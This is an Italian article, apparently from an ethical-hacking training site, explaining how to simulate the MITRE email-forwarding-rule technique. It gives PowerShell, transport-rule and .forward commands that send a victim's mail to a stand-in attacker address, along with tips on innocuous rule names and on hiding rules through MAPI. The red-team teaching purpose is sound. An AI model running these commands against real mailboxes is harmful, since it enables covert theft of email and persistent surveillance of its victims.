Regole di Inoltro Email: Email Forwarding Rule (T1114.003)

Le regole di inoltro email rappresentano uno dei meccanismi di persistenza e raccolta dati più sottili a disposizione di un avversario. La tecnica si colloca nella tattica Collection (TA0009), la fase della kill chain in cui l'attaccante raccoglie informazioni di interesse — in questo caso intercettando il flusso di posta elettronica della vittima per estrarre credenziali, documenti riservati e intelligence operativa sull'organizzazione target.

Il principio è semplice quanto efficace: una volta ottenuto l'accesso a una casella di posta (o a un pannello di amministrazione), l'avversario configura una regola che inoltra automaticamente tutti i messaggi — o quelli corrispondenti a criteri specifici — verso un indirizzo sotto il proprio controllo. Il risultato è un canale di esfiltrazione silenzioso che sopravvive anche al reset delle credenziali compromesse, perché la regola resta attiva finché qualcuno non la individua e la rimuove esplicitamente.

La tecnica copre un ventaglio ampio di implementazioni: regole create tramite interfaccia web, client desktop, cmdlet PowerShell, oppure transport rule a livello organizzativo in ambienti Exchange. Alcuni avversari nascondono ulteriormente le regole manipolando le proprietà MAPI, rendendole invisibili ai normali strumenti di amministrazione. Con 5 gruppi APT documentati che impiegano questa tecnica e 4 mitigazioni raccomandate, si tratta di un vettore concreto e attivamente sfruttato.


La simulazione di questa tecnica in un engagement red team richiede l'accesso a una casella di posta compromessa — tipicamente ottenuto tramite phishing, password spraying o abuso di token OAuth. Una volta dentro, il passo successivo è creare la regola di inoltro e verificarne la persistenza dopo un ipotetico reset credenziali.

Scenario Exchange Online / Microsoft 365. Il punto di partenza è la connessione al tenant Exchange Online tramite il modulo PowerShell ufficiale. Dopo l'autenticazione con credenziali compromesse (o token d'accesso):

Connect-ExchangeOnline -UserPrincipalName vittima@dominio.com

Si crea una inbox rule che inoltra tutto verso un indirizzo esterno controllato dall'operatore:

New-InboxRule -Name "RSS Subscription" -ForwardTo attacker@exfil-domain.com -MarkAsRead $true -Mailbox vittima@dominio.com

Il flag -MarkAsRead segna i messaggi come letti, riducendo la probabilità che la vittima noti l'attività. Il nome della regola dovrebbe essere innocuo — "RSS Subscription", "Calendar Sync", "Backup" funzionano bene.

Per simulare lo scenario più aggressivo documentato da LAPSUS$, che ha creato transport rule a livello tenant per catturare tutto il traffico email dell'organizzazione:

New-TransportRule -Name "Journal Archive Rule" -FromScope InOrganization -BlindCopyTo attacker@exfil-domain.com

Questa regola opera a livello organizzativo, intercettando tutti i messaggi interni e in uscita senza toccare le singole mailbox. È estremamente rumorosa ma devastante se non individuata.

Scenario MAPI — regola nascosta. Per replicare la tecnica di occultamento tramite MAPI, lo strumento di riferimento è MFCMAPI (open source), il MAPI Editor di Microsoft disponibile su GitHub. Consente di accedere direttamente al database della mailbox, navigare nella tabella delle regole e modificare le proprietà PR_RULE_MSG_PROVIDER e PR_RULE_ACTIONS per rendere la regola invisibile a Outlook e alla console di amministrazione Exchange.

Scenario Linux — file .forward. Su server che utilizzano MTA tradizionali come Postfix o Sendmail, l'inoltro si configura semplicemente scrivendo un indirizzo nel file .forward nella home directory dell'utente:

echo "attacker@exfil-domain.com" > ~/.forward

Per ambienti con Procmail, la stessa operazione si esegue aggiungendo una ricetta nel file .procmailrc che duplica i messaggi verso l'indirizzo controllato.

Scenario macOS — Apple Mail. Le regole di Apple Mail vengono salvate in file plist sotto la directory ~/Library/Mail. È possibile manipolarle tramite AppleScript o editando direttamente il plist con defaults write o plutil, anche se questo approccio richiede accesso locale alla macchina.

Il tool MailSniper (open source) è utile per enumerare le regole esistenti su mailbox Exchange durante la fase di ricognizione, prima di decidere dove iniettare nuove regole senza sovrapporsi a quelle legittime.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.